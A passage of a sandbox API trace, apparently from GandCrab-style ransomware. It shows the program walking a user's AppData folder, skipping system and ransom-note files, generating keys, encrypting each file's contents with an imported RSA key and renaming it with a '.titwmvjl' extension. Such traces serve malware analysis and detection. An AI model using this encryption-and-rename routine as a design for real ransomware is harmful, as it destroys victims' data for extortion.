CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\hiy5p_svmm4d c3.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.145] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.145] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.146] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.146] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.146] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.147] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.147] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.147] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.147] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.147] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.147] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.148] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.148] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.148] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.148] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.148] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.149] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.149] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.149] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.150] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0070.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.150] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.150] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.150] GetLastError () returned 0x0 [0070.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.150] CryptDestroyKey (hKey=0x5036f8) returned 1 [0070.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.151] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.151] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.151] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503838) returned 1 [0070.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.151] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.152] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.152] GetLastError () returned 0x0 [0070.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.152] CryptDestroyKey (hKey=0x503838) returned 1 [0070.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.152] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.152] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.152] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.152] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x50bf, lpOverlapped=0x0) returned 1 [0070.158] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffaf41, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x50bf, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x50bf, lpOverlapped=0x0) returned 1 [0070.160] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.161] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.165] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.166] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.166] CloseHandle (hObject=0x2b4) returned 1 [0070.167] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\hiy5p_svmm4d c3.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\hiy5p_svmm4d c3.xlsx.titwmvjl"), dwFlags=0x1) returned 1 [0070.168] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.168] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.168] lstrcmpW (lpString1="I3aPKS.wav", lpString2=".") returned 1 [0070.168] lstrcmpW (lpString1="I3aPKS.wav", lpString2="..") returned 1 [0070.168] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="I3aPKS.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav" [0070.168] lstrlenW (lpString=".titwmvjl") returned 9 [0070.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav") returned 48 [0070.168] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.168] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav.titwmvjl") returned 57 [0070.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav") returned 48 [0070.168] lstrlenW (lpString=".wav") returned 4 [0070.168] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.168] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".wav ") returned 5 [0070.169] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0070.169] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav") returned 48 [0070.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav") returned 48 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="desktop.ini") returned 1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="autorun.inf") returned 1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="ntuser.dat") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="iconcache.db") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="bootsect.bak") returned 1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="boot.ini") returned 1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="ntuser.dat.log") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="thumbs.db") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="CRAB-DECRYPT.html") returned 1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="ntldr") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="NTDETECT.COM") returned -1 [0070.169] lstrcmpiW (lpString1="I3aPKS.wav", lpString2="Bootfont.bin") returned 1 [0070.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav") returned 48 [0070.169] lstrlenW (lpString=".wav") returned 4 [0070.169] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.169] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".wav ") returned 5 [0070.169] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.170] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.170] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\i3apks.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.170] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.170] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.171] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.171] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.171] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.171] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.172] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.172] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.172] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.172] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.172] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.172] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.173] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.173] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.173] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.173] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.173] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.173] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.174] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5032f8) returned 1 [0070.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.174] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.174] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.174] GetLastError () returned 0x0 [0070.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.174] CryptDestroyKey (hKey=0x5032f8) returned 1 [0070.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.175] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.175] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.176] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5031f8) returned 1 [0070.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.176] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.176] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.176] GetLastError () returned 0x0 [0070.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.176] CryptDestroyKey (hKey=0x5031f8) returned 1 [0070.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.177] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.177] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.177] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.177] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x12b4, lpOverlapped=0x0) returned 1 [0070.182] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffed4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x12b4, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x12b4, lpOverlapped=0x0) returned 1 [0070.184] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.184] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.185] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.189] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.189] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.189] CloseHandle (hObject=0x2b4) returned 1 [0070.190] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\i3apks.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\I3aPKS.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\i3apks.wav.titwmvjl"), dwFlags=0x1) returned 1 [0070.191] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.191] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.191] lstrcmpW (lpString1="iBxnpfNq.swf", lpString2=".") returned 1 [0070.191] lstrcmpW (lpString1="iBxnpfNq.swf", lpString2="..") returned 1 [0070.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="iBxnpfNq.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf" [0070.191] lstrlenW (lpString=".titwmvjl") returned 9 [0070.191] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf") returned 50 [0070.191] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.191] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf.titwmvjl") returned 59 [0070.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf") returned 50 [0070.192] lstrlenW (lpString=".swf") returned 4 [0070.192] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.192] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".swf ") returned 5 [0070.192] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0070.192] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf") returned 50 [0070.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf") returned 50 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="desktop.ini") returned 1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="autorun.inf") returned 1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="ntuser.dat") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="iconcache.db") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="bootsect.bak") returned 1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="boot.ini") returned 1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="ntuser.dat.log") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="thumbs.db") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="CRAB-DECRYPT.html") returned 1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="ntldr") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="NTDETECT.COM") returned -1 [0070.192] lstrcmpiW (lpString1="iBxnpfNq.swf", lpString2="Bootfont.bin") returned 1 [0070.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf") returned 50 [0070.192] lstrlenW (lpString=".swf") returned 4 [0070.192] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.193] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".swf ") returned 5 [0070.193] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.193] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.193] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ibxnpfnq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.193] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.193] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.194] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.194] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.194] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.195] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.195] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.195] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.195] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.195] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.195] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.196] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.196] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.196] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.196] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.196] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.196] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.196] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.197] CryptImportKey (in: hProv=0x4cdb38, 